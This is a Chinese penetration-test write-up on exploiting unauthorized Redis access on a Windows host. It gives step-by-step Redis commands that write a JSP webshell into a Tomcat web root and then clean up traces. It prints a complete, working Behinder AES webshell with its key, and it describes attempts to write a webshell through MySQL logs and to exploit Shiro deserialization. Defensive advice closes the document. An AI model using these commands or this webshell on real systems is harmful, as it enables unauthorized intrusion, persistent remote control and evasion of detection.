Redis未授权访问与Windows环境下的渗透利用<\/h1>

1. 信息收集阶段<\/h2>

1.1 端口扫描发现<\/h3>

目标系统开放了多个端口：

21\/tcp (FTP)<\/li>
80\/tcp (HTTP, Microsoft IIS httpd 10.0)<\/li>
6379\/tcp (Redis)<\/li>
8085\/tcp (HTTP, nginx 1.16.1)<\/li>
8089\/tcp (HTTP, 404)<\/li>

8098\/tcp (HTTP, 404)<\/li> <\/ul> <\/li> <\/ul>

1.2 服务识别<\/h3>

Redis服务(6379)被发现存在未授权访问漏洞<\/li>
Web服务运行在IIS和nginx上<\/li>

多个Tomcat实例(通过8089和8098端口判断)<\/li> <\/ul>

2. Redis未授权访问利用<\/h2>

2.1 Redis基础利用方法<\/h3>

Linux环境下<\/strong>：

写入SSH公钥<\/li>
写入计划任务反弹shell<\/li> <\/ul> <\/li>
Windows环境下<\/strong>：

只能写入webshell<\/li>
需要获取web目录的真实路径<\/li> <\/ul> <\/li> <\/ul>
2.2 Windows环境下的利用步骤<\/h3>

获取web目录<\/strong>：<\/p>

通过网站目录浏览功能发现多个Tomcat实例<\/li>
确认其中一个可访问目录：C:\Program Files\**\*\ROOT<\/code><\/li> <\/ul> <\/li>
Redis写入webshell<\/strong>：<\/p> config set dir "C:\Program Files\**\*\ROOT" config set dbfilename "index-back.jsp" set xxx1xxx "\<\%\@page import\=\"java.util.*\,javax.crypto.*\,javax.crypto.spec.class U extends ClassLoader{U(ClassLoader c){super(c)\;}public Class g(byte []b){return super.defineClass(b\,0\,b.length)if (request.getMethod().equals(\"POST\"")){String k\=\"e45e329feb5d925b\"\;session.putValue(\"u\"\,k)\;Cipher c\=Cipher.getInstance(\"AES\")\;c.init(2\,new SecretKeySpec(k.getBytes()\,\"AES\"))\;new U(this.getClass().getClassLoader()).g(c.doFinal(new sun.misc.BASE64Decoder().decodeBuffer(request.getReader().readLine()))).newInstance().equals(pageContext)" save <\/code><\/pre> <\/li> 清理痕迹<\/strong>：<\/p> del xxx1xxx config set dir "C:\**\*" config set dbfilename "dump" <\/code><\/pre> <\/li> <\/ol> 2.3 使用的Webshell<\/h3> 冰蝎(Behinder)加密马：<\/li> <\/ul> <%@page import="java.util.*,javax.crypto.*,javax.crypto.spec.*"%><%!class U extends ClassLoader{U(ClassLoader c){super(c);}public Class g(byte []b){return super.defineClass(b,0,b.length);}}%><%if (request.getMethod().equals("POST")){String k="e45e329feb5d925b";session.putValue("u",k);Cipher c=Cipher.getInstance("AES");c.init(2,new SecretKeySpec(k.getBytes(),"AES"));new U(this.getClass().getClassLoader()).g(c.doFinal(new sun.misc.BASE64Decoder().decodeBuffer(request.getReader().readLine()))).newInstance().equals(pageContext);}%> <\/code><\/pre> 3. 其他尝试的攻击方法<\/h2> 3.1 文件上传漏洞<\/h3> 发现系统接收PUT方法上传文件<\/li> 尝试绕过失败，原因是临时上传目录不存在<\/li> 错误信息：Failed to parse multipart servlet request; nested exception is java.io.IOException: The temporary upload location<\/code><\/li> <\/ul> 3.2 MySQL日志写入Webshell<\/h3> 尝试通过慢查询日志写入Webshell：<\/li> <\/ul> SHOW<\/span> VARIABLES LIKE<\/span> "%slow_query_log%"<\/span>; <\/span><\/span>set<\/span> global<\/span> slow_query_log=<\/span>1<\/span>; <\/span><\/span>set<\/span> global<\/span> slow_query_log_file=<\/span>'C:\Tomcat\webapps\ROOT\conf-back.jsp'<\/span>; <\/span><\/span>select<\/span> '<%@page import="java.util.*,javax.crypto........一句话木马'<\/span> or<\/span> sleep(11<\/span>); <\/span><\/span><\/code><\/pre> 失败原因：SQL语句被URL编码拼接，解释器处理方式不同<\/li> <\/ul> 3.3 Shiro反序列化<\/h3> 发现响应头有rememberMe=deleteMe<\/code>标识<\/li> 尝试使用Shiro反序列化工具： ShiroScan: https:\/\/github.com\/fupinglee\/ShiroScan\/releases<\/li> ysoserial: https:\/\/github.com\/frohoff\/ysoserial<\/li> <\/ul> <\/li> 失败原因：系统只使用token标识，不使用cookie<\/li> <\/ul> 4. 防御建议<\/h2> Redis安全配置<\/strong>：<\/p> 设置强密码认证<\/li> 绑定特定IP访问<\/li> 修改默认端口<\/li> 禁用危险命令(如config)<\/li> <\/ul> <\/li> Web应用安全<\/strong>：<\/p> 避免使用弱密码，特别是管理系统<\/li> 对文件上传功能进行严格限制<\/li> 避免目录遍历漏洞<\/li> 对登录凭证进行加密，避免单纯依赖token<\/li> <\/ul> <\/li> 系统架构安全<\/strong>：<\/p> 非必要服务不要暴露在公网<\/li> 测试环境应与生产环境隔离<\/li> 使用白名单限制访问<\/li> 业务服务使用普通用户权限运行<\/li> <\/ul> <\/li> 日志与监控<\/strong>：<\/p> 监控异常文件创建和修改<\/li> 记录Redis的config命令使用<\/li> 监控Web目录下的异常文件<\/li> <\/ul> <\/li> <\/ol> 5. 参考工具<\/h2> Shiro反序列化工具<\/strong>：<\/p> https:\/\/github.com\/fupinglee\/ShiroScan<\/li> https:\/\/github.com\/wh1t3p1g\/ysoserial<\/li> https:\/\/github.com\/zema1\/ysoserial\/<\/li> <\/ul> <\/li> Redis利用参考<\/strong>：<\/p> 《Redis on Windows 出网利用探索》: https:\/\/xz.aliyun.com\/t\/8153<\/li> <\/ul> <\/li> Webshell工具<\/strong>：<\/p> 冰蝎(Behinder): 加密型webshell管理工具<\/li> <\/ul> <\/li> <\/ol> 6. 总结<\/h2> 本次渗透测试展示了在Windows环境下利用Redis未授权访问漏洞获取系统权限的过程。关键点包括：<\/p> 通过信息收集发现Redis未授权访问漏洞<\/li> 利用目录遍历功能获取web真实路径<\/li> 通过Redis写入加密webshell<\/li> 使用冰蝎连接获取控制权限<\/li> <\/ol> 防御此类攻击需要多层次的防护措施，包括服务配置加固、权限最小化和完善的监控机制。<\/p>